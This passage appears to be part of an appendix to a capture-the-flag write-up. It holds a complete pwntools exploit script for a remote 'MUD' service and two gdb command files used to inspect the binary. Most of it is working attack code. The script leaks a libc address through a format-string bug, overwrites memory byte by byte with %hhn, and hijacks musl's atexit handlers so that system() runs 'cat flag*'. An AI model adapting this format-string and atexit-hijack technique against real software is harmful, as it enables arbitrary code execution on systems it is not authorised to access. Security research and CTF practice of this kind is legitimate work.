#   i.e. arg8->buf+0, arg9->buf+8, ..., arg13->buf+40.
ARG_INDEX = 13
PTR_OFF = 8 * (ARG_INDEX - 8)  # 40
MAX_READ = 0x30

def make_char_zero_class(io, idx=0):
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'>>')
  io.sendline(b'1')
  io.recvuntil(b'>>')
  io.send(b'A' * 32 + b'\n')

def send_message(io, idx: int, payload: bytes) -> bytes:
  io.recvuntil(b'>>')
  io.sendline(b'2')
  io.recvuntil(b'enter index:')
  io.sendline(str(idx).encode())
  io.recvuntil(b'leave..')

  if payload.count(b'%') > 13:
    raise ValueError('too many %')
  if len(payload) > MAX_READ:
    raise ValueError('payload too long')

  io.send(payload + b'\n')
  io.recvuntil(b'The message left for other adventurers..\n')
  out = io.recvuntil(b'---MUD---', drop=True, timeout=3)
  return out

def craft_with_ptr(fmt: bytes, ptr: int) -> bytes:
  if b'\x00' in fmt:
    raise ValueError('fmt must not contain NUL')
  if len(fmt) >= PTR_OFF:
    raise ValueError('fmt too long to place ptr at fixed offset')
  filler_len = PTR_OFF - (len(fmt) + 1)
  payload = fmt + b'\x00' + (b'X' * filler_len) + p64(ptr)
  if len(payload) > MAX_READ:
    raise ValueError('payload exceeds 0x30 read budget')
  return payload

def leak_ptr(io, addr: int, max_bytes: int = 16) -> bytes:
  fmt = (b'%p' * 12) + b'|' + b'%s'
  out = send_message(io, 0, craft_with_ptr(fmt, addr))
  if b'|' not in out:
    return b''
  leak = out.split(b'|', 1)[1]
  return leak[:max_bytes]

def write_hhn(io, where: int, byte_val: int):
  assert 0 <= byte_val <= 0xFF
  pad = (byte_val - 11) % 256
  if pad == 0:
    pad = 256
  fmt = (b'%c' * 11) + f'%{pad}c%hhn'.encode()
  send_message(io, 0, craft_with_ptr(fmt, where))

def write_qword(io, where: int, value: int):
  for i in range(8):
    write_hhn(io, where + i, (value >> (8 * i)) & 0xFF)

def write_bytes(io, where: int, data: bytes):
  for i, b in enumerate(data):
    write_hhn(io, where + i, b)

def solve_once() -> bytes:
  io = remote(HOST, PORT, ssl=True, sni=HOST)

  make_char_zero_class(io, 0)

  # Leak printf@got -> libc base
  printf_got = elf.got['printf']
  leak = leak_ptr(io, printf_got, max_bytes=8)
  log.info(f'printf@got leak bytes: {leak!r}')
  printf_addr = u64(leak.ljust(8, b'\x00'))
  libc_base = printf_addr - libc.symbols['printf']
  log.info(f'libc_base = {hex(libc_base)}')

  system_addr = libc_base + libc.symbols['system']
  head_addr = libc_base + 0xc0d88
  slot_addr = libc_base + 0xc0fa4

  fake = 0x404200
  cmd_addr = fake + 0x180

  # Non-interactive: call system("cat flag*") directly.
  cmd = b'cat flag* 2>/dev/null; cat /flag 2>/dev/null\n\x00'

  log.info(f'system={hex(system_addr)} head={hex(head_addr)} slot={hex(slot_addr)}')

  # Fake atexit block
  write_qword(io, fake + 0x0, 0)
  write_qword(io, fake + 0x8, system_addr)
  write_qword(io, fake + 0x108, cmd_addr)
  write_bytes(io, cmd_addr, cmd)

  # Redirect musl atexit state
  write_qword(io, head_addr, fake)
  write_hhn(io, slot_addr + 0, 1)
  write_hhn(io, slot_addr + 1, 0)
  write_hhn(io, slot_addr + 2, 0)
  write_hhn(io, slot_addr + 3, 0)

  log.info('Triggering exit...')
  io.recvuntil(b'>>')
  io.sendline(b'3')

  # Collect output until the service closes or times out.
  data = io.recvall(timeout=3)
  io.close()
  return data

def main():
  out = solve_once()
  if out:
    # Print raw; flags often include newlines.
    print(out.decode('utf-8', errors='replace'), end='')

if __name__ == '__main__':
  main()

>A.8 gdb_cmds.txt

set pagination off
set disassembly-flavor intel
break *0x401657
run < gdb_input.bin
printf "\n--- regs at call-site ---\n"
info registers rdi rsi rdx rcx r8 r9 rsp rbp
printf "\n--- stack around rsp ---\n"
x/40gx $rsp
printf "\n--- message buffer (rdi) ---\n"
x/80bx $rdi
printf "\n--- bytes from rsp+0x0..0x80 ---\n"
x/128bx $rsp
quit

>A.9 gdb_cmds2.txt

set pagination off
break *0x401657
run < gdb_input.bin
printf "BUF=%p\n", $rdi
# environ is in libc; should resolve
printf "ENVIRON_SYM=%p\n", environ
x/gx environ
printf "ENV_PTR=%p\n", *(void**)environ
printf "DELTA(envp_ptr-buf)=%ld\n", (long)(*(void**)environ) - (long)$rdi
quit